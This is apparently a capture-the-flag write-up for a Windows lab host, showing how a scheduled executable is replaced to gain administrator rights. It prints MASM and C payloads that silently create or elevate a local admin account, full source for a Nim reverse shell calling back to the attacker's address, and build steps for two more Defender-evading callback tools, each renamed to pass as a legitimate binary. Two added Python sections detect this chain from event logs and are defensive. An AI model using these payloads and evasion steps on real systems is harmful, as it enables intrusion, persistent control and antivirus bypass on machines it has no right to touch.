MASM


The HACKSMARTERSEC (10.10.183.209) host has AV enabled and enforced. Executing a malicious PE file will be flagged and removed by AV.

.586
.model flat, stdcall
option casemap:none
 
includelib kernel32.lib
ExitProcess proto :dword
WinExec proto :dword, :dword
 
.data
cmd db 'cmd /c "net user adm1n Qwer1234 /ADD && net localgroup Administrators /ADD adm1n"',0
 
.code
main:
  push 0            ; SW_HIDE = 0 (hide console window)
  push offset cmd   ; Command string
  call WinExec      ; Execute the command
  push 0            ; Exit code
  call ExitProcess  ; Terminate the program
end main

Creating an assembly that creates a local admin user for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.
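On the defensive side, the `net user ... /ADD && net localgroup Administrators ... /ADD` sequence the payload above runs leaves a fixed trail in the Windows Security log: event 4720 (user account created) followed almost immediately by event 4732 (member added to a security-enabled local group) for the built-in Administrators group. The following is an added detection example, not part of the original write-up; the event records are constructed sample data and the field names follow those two events' Security log fields.

```python
"""
Correlate Security events 4720 and 4732 to flag a freshly created account that
is added to BUILTIN\Administrators within a short window (the pattern produced
by "net user X /ADD && net localgroup Administrators X /ADD").
Sample records are constructed for this example, not real log data.
"""
from datetime import datetime, timedelta

# Well-known SID of the built-in Administrators group
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed sample events (not real log data). Times are ISO 8601.
SAMPLE_EVENTS = [
    # The payload's pattern: account created, then added to Administrators 1s later
    {"EventID": 4720, "Time": "2025-07-05T19:30:01", "SubjectUserName": "tyler",
     "TargetUserName": "adm1n", "TargetSid": "S-1-5-21-1111-2222-3333-1010"},
    {"EventID": 4732, "Time": "2025-07-05T19:30:02", "SubjectUserName": "tyler",
     "MemberSid": "S-1-5-21-1111-2222-3333-1010", "TargetSid": ADMINISTRATORS_SID,
     "TargetUserName": "Administrators"},
    # Benign: helpdesk creates a user, and only grants admin the next day
    {"EventID": 4720, "Time": "2025-07-05T10:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1111-2222-3333-1011"},
    {"EventID": 4732, "Time": "2025-07-06T09:00:00", "SubjectUserName": "helpdesk",
     "MemberSid": "S-1-5-21-1111-2222-3333-1011", "TargetSid": ADMINISTRATORS_SID,
     "TargetUserName": "Administrators"},
]


def find_new_local_admins(events, window=timedelta(minutes=5)):
    """Return (new_user, actor, seconds_between) for every 4720 that is
    followed within `window` by a 4732 adding the same SID to Administrators."""
    created = {}  # TargetSid -> (username, actor, creation time)
    hits = []
    # ISO 8601 timestamps sort correctly as strings
    for ev in sorted(events, key=lambda e: e["Time"]):
        t = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], ev["SubjectUserName"], t)
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            info = created.get(ev["MemberSid"])
            if info is not None and t - info[2] <= window:
                hits.append((info[0], ev["SubjectUserName"], (t - info[2]).total_seconds()))
    return hits


if __name__ == "__main__":
    for user, actor, secs in find_new_local_admins(SAMPLE_EVENTS):
        print(f"[!] {actor} created {user} and made it a local admin {secs:.0f}s later")
```

Keying on the SID rather than the username avoids being fooled by an account that is created, renamed and then added, and the time window keeps ordinary onboarding (create today, grant admin later after approval) out of the alert.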

C:\HackSmarterSecurity> ml /c /coff spoofer-scheduler.asm
Microsoft (R) Macro Assembler Version 14.29.30153.0
Copyright (C) Microsoft Corporation.  All rights reserved.
 
 Assembling: spoofer-scheduler.asm
 
C:\HackSmarterSecurity> link /SUBSYSTEM:WINDOWS /ENTRY:main spoofer-scheduler.obj
Microsoft (R) Incremental Linker Version 14.29.30153.0
Copyright (C) Microsoft Corporation.  All rights reserved.
 
C:\HackSmarterSecurity> dir
 Volume in drive C is OS
 Volume Serial Number is 1AF6-BCBE
 
 Directory of C:\HackSmarterSecurity
 
07/05/2025  07:28 PM    <DIR>          .
07/05/2025  07:19 PM    <DIR>          ..
07/05/2025  07:25 PM               477 spoofer-scheduler.asm
07/05/2025  07:28 PM             3,072 spoofer-scheduler.exe
07/05/2025  07:27 PM               788 spoofer-scheduler.obj
               3 File(s)          4,337 bytes
               2 Dir(s)  18,636,300,288 bytes free

Assembling & linking

Nim-Reverse-Shell


Reverse shell to bypass Windows Defender.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ git clone https://github.com/Sn1r/Nim-Reverse-Shell                                    
Cloning into 'Nim-Reverse-Shell'...
remote: Enumerating objects: 13, done.
remote: Counting objects: 100% (13/13), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 13 (delta 2), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (13/13), 4.22 KiB | 4.22 MiB/s, done.
Resolving deltas: 100% (2/2), done.

Cloning the repo

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/Nim-Reverse-Shell]
└─$ curl https://nim-lang.org/choosenim/init.sh -sSf | sh
choosenim-init: Downloading choosenim-0.8.12_linux_amd64
Downloading Nim 2.2.4 from nim-lang.org
[##################################################] 100.0% 0kb/s
 Extracting nim-2.2.4-linux_x64.tar.xz
 Extracting nim-2.2.4-linux_x64.tar
   Building Nim 2.2.4
  Compiler: Already built
  Installed component 'nim'
  Installed component 'nimble'
  Installed component 'nimgrep'
  Installed component 'nimpretty'
  Installed component 'nimsuggest'
  Installed component 'testament'
  Installed component 'nim-gdb'
   Switched to Nim 2.2.4
choosenim-init: ChooseNim installed in /home/kali/.nimble/bin
choosenim-init: You must now ensure that the Nimble bin dir is in your PATH.
choosenim-init: Place the following line in the ~/.profile or ~/.bashrc file.
choosenim-init:     export PATH=/home/kali/.nimble/bin:$PATH

Installing Nim

import net, os, osproc, strutils
 
proc exe(c: string): string =
  result = execProcess("cm" & "d /c " & c)
 
var
  v = newSocket()
 
  # Change this
  v1 = "10.9.0.130"
  v2 = "443"
 
  s4 = "Exiting.."
  s5 = "cd"
  s6 = "C:\\"
 
try:
  v.connect(v1, Port(parseInt(v2)))
 
  while true:
    v.send(os.getCurrentDir() & "> ")
    let c = v.recvLine()
    if c == "exit":
      v.send(s4)
      break
 
    if c.strip() == s5:
      os.setCurrentDir(s6)
    elif c.strip().startswith(s5):
      let d = c.strip().split(' ')[1]
      try:
        os.setCurrentDir(d)
      except OSError as b:
        v.send(repr(b) & "\n")
        continue
    else:
      let r = exe(c)
      v.send(r)
 
except:
  raise
finally:
  v.close

Modifying the Nim script for the current context (listener address and port).

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/Nim-Reverse-Shell]
└─$ nim c -d:mingw --app:gui rev_shell.nim               
Hint: used config file '/home/kali/.choosenim/toolchains/nim-2.2.4/config/nim.cfg' [Conf]
Hint: used config file '/home/kali/.choosenim/toolchains/nim-2.2.4/config/config.nims' [Conf]
.......................................................................................................................................
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system/exceptions.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/private/digitsutils.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/assertions.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system/dollars.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system/repr_v2.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/widestrs.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/syncio.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/system.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/parseutils.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/strutils.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/dynlib.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/windows/winlean.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/oserrors.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/times.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/private/ospaths2.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/private/win_setenv.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/cmdline.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/os.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/nativesockets.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/std/monotimes.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/net.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/streams.nim
CC: ../../../../.choosenim/toolchains/nim-2.2.4/lib/pure/osproc.nim
CC: rev_shell.nim
Hint:  [Link]
Hint: mm: orc; threads: on; opt: none (DEBUG BUILD, `-d:release` generates faster code)
62047 lines; 2.400s; 91.766MiB peakmem; proj: /home/kali/archive/thm/hacksmartersecurity/Nim-Reverse-Shell/rev_shell.nim; out: /home/kali/archive/thm/hacksmartersecurity/Nim-Reverse-Shell/rev_shell.exe [SuccessX]
 
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/Nim-Reverse-Shell]
└─$ mv rev_shell.exe spoofer-scheduler.exe

Building complete for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

C


#include <stdlib.h>
 
int main() {
  system("cmd.exe /c net localgroup Administrators tyler /add");
  return 0;
}

Simple C code for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ x86_64-w64-mingw32-gcc spoofer-scheduler.c -o spoofer-scheduler.exe

Compile

update_script


Another reverse shell method to bypass Defender: update_script.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ git clone https://github.com/daniellowrie/update_script cd update_script
Cloning into 'update_script'...
remote: Enumerating objects: 183, done.
remote: Counting objects: 100% (180/180), done.
remote: Compressing objects: 100% (122/122), done.
remote: Total 183 (delta 96), reused 101 (delta 57), pack-reused 3 (from 1)
Receiving objects: 100% (183/183), 4.90 MiB | 8.33 MiB/s, done.
Resolving deltas: 100% (96/96), done.

Cloning the repo

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ go build SecUp.go

Building SecUp.go

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ ./SecUp $tun0
LHOST:     10.9.0.130
LPORT:     443
******************************************
[!] Start your listener on port 443
[!] Press ENTER to continue...
 
******************************************
[!] Attack files have been generated
******************************************
[-] update_script.go
[-] r1
[-] WinSecUp
 
******************************************
[!] HTTP Server is running on port 8000
[!] Press CTRL+C to Exit
 
******************************************
[!] Compile and Upload 'update_script.exe' to target and execute
[!] Check Listener for connection
 
******************************************

Setting up

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ GOOS=windows go build update_script.go
 
┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity/update_script]
└─$ mv update_script.exe spoofer-scheduler.exe

Compiling & renaming for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.

reverse_ssh


Another reverse shell method using SSH to bypass Defender: reverse_ssh. This is more like a C2.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ docker run -p3232:2222 -e EXTERNAL_ADDRESS=$tun0:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v ./data:/data reversessh/reverse_ssh    
authorized_keys is not empty, ignoring SEED_AUTHORIZED_KEYS\n
2025/07/05 18:44:14 Loading files from /data
2025/07/05 18:44:14 connect back:  10.9.0.130:3232
2025/07/05 18:44:14 Version:  v2.6.18-2-gd042bc4
2025/07/05 18:44:14 Listening on :2222
2025/07/05 18:44:14 Loading private key from: /data/id_ed25519
2025/07/05 18:44:14 Server key fingerprint:  d67c5e650b2f4bfbaee0eff285ea9fb3a51f7b534e32dc10dce5ff3f16028162
2025/07/05 18:44:14 Started Raw Download Server
2025/07/05 18:44:14 Started Web Server

Setting up the RSSH server

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ docker images reversessh/reverse_ssh
REPOSITORY               TAG       IMAGE ID       CREATED       SIZE
reversessh/reverse_ssh   latest    0bb72c5830eb   6 weeks ago   2.55GB

It’s massive.

┌──(kali㉿kali)-[~/archive/thm/hacksmartersecurity]
└─$ ssh localhost -p 3232
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
catcher$ 

Session established to the RSSH server

catcher$ link --goos windows  
http://10.9.0.130:3232/f34c0affc1580f49c4fc6f5c6217096d

Generating & hosting binary for privilege escalation on the HACKSMARTERSEC(10.10.183.209) host.
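All three reverse shell methods above (the Nim shell on port 443, update_script with its stager fetching from the HTTP server on port 8000, and the reverse_ssh client connecting back on port 3232) share one observable: a freshly dropped executable outside the standard program directories initiating an outbound connection. The following is an added hunting example, not code from the write-up or from any of the quoted tools; the records are constructed sample data whose field names follow the Sysmon Event ID 3 (network connection) schema.

```python
"""
Hunt Sysmon Event ID 3 records for outbound connections initiated by
executables that do not live under the standard Windows program directories.
Sample records are constructed for this example, not real telemetry.
"""
import ntpath

# Directories from which outbound connections are expected (compared lower-case)
TRUSTED_DIRS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Constructed sample Sysmon Event 3 records (not real log data)
SAMPLE_EVENTS = [
    # Browser from Program Files: expected
    {"Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationIp": "142.250.80.46", "DestinationPort": 443, "Initiated": True},
    # Renamed reverse shell dropped in a user-writable location
    {"Image": "C:\\Users\\tyler\\AppData\\Local\\Temp\\spoofer-scheduler.exe",
     "DestinationIp": "10.9.0.130", "DestinationPort": 443, "Initiated": True},
    # Inbound connection (Initiated = False): not an outbound beacon, skip
    {"Image": "C:\\Windows\\System32\\svchost.exe",
     "DestinationIp": "10.9.0.130", "DestinationPort": 3232, "Initiated": False},
    # Stager pulling its second stage from the attacker's HTTP server
    {"Image": "C:\\Users\\tyler\\Downloads\\update_script.exe",
     "DestinationIp": "10.9.0.130", "DestinationPort": 8000, "Initiated": True},
]


def is_trusted_location(image_path):
    """True if the executable sits under one of TRUSTED_DIRS."""
    return image_path.lower().startswith(TRUSTED_DIRS)


def suspicious_outbound(events):
    """Return (exe_name, destination_ip, destination_port) for each outbound
    connection initiated from outside the trusted program directories."""
    hits = []
    for ev in events:
        if not ev["Initiated"]:
            continue  # only connections the process itself opened
        if is_trusted_location(ev["Image"]):
            continue
        hits.append((ntpath.basename(ev["Image"]), ev["DestinationIp"], ev["DestinationPort"]))
    return hits


def destinations_by_executable(events):
    """Group flagged connections by executable name so a single dropped binary
    talking to several ports on one host (443 shell, 8000 stager, 3232 SSH)
    shows up as one item to investigate."""
    grouped = {}
    for exe, ip, port in suspicious_outbound(events):
        grouped.setdefault(exe, set()).add((ip, port))
    return grouped


if __name__ == "__main__":
    for exe, dests in destinations_by_executable(SAMPLE_EVENTS).items():
        print(f"[!] {exe} -> {sorted(dests)}")
```

Renaming the payload to something plausible like `spoofer-scheduler.exe` defeats a filename match, which is why the heuristic keys on where the image runs from and whether it opened the connection itself rather than on what it is called; pair it with the account-creation correlation earlier on the page and the whole chain (drop, call back, add admin) becomes visible from host telemetry alone.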